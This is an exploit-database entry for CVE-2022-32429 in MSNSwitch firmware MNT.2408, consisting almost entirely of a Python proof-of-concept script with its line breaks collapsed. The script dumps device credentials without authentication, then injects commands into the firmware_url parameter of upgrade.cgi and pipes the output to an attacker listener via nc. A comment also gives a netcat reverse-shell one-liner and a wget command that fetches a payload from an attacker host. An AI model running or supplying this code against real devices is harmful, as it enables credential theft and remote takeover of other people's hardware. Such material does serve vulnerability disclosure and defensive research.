MSNSwitch Firmware MNT.2408 Remote Code Execution

Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)Google Dork: n/aDate:9/1/2022Exploit Author: Eli FulkersonVendor Homepage: https://www.msnswitch.com/Version: MNT.2408Tested on: MNT.2408 firmwareCVE: CVE-2022-32429#!/usr/bin/python3"""POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.Configuration dump only requires HTTP access.Full RCE requires you to be on the same subnet as the device.""" import requestsimport sysimport urllib.parseimport readlineimport randomimport string# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOSTLISTENER_HOST = "192.168.EDIT.ME"LISTENER_PORT = 3434# target msnswitchTARGET="192.168.EDIT.ME2"PORT=80USERNAME = NonePASSWORD = None"""First vulnerability, unauthenticated configuration/credential dump"""if USERNAME == None or PASSWORD == None:  # lets just ask  hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"  session = requests.session()  data = session.get(hack_url)  for each in data.text.split('\n'):    key = None    val = None    try:      key = each.strip().split('=')[0]      val = each.strip().split('=')[1]    except:      pass    if key == "Account1":      USERNAME = val    if key == "Password1":      PASSWORD = val"""Second vulnerability, authenticated command executionThis only works on the local lan.for full reverse shell, modify and upload netcat busybox shell script to /tmp:  shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f  download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmpref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox"""session = requests.session()# initial login, establishes our Cookieburp0_url = f"http://{TARGET}:{PORT}/goform/login"burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}session.post(burp0_url, headers=burp0_headers, data=burp0_data)# get our csrftokenburp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"data = session.get(burp0_url)csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]while True:  CMD = input('x:')  CMD_u = urllib.parse.quote_plus(CMD)  filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))  try:    hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"    session.get(hack_url, timeout=0.01)  except requests.exceptions.ReadTimeout:    pass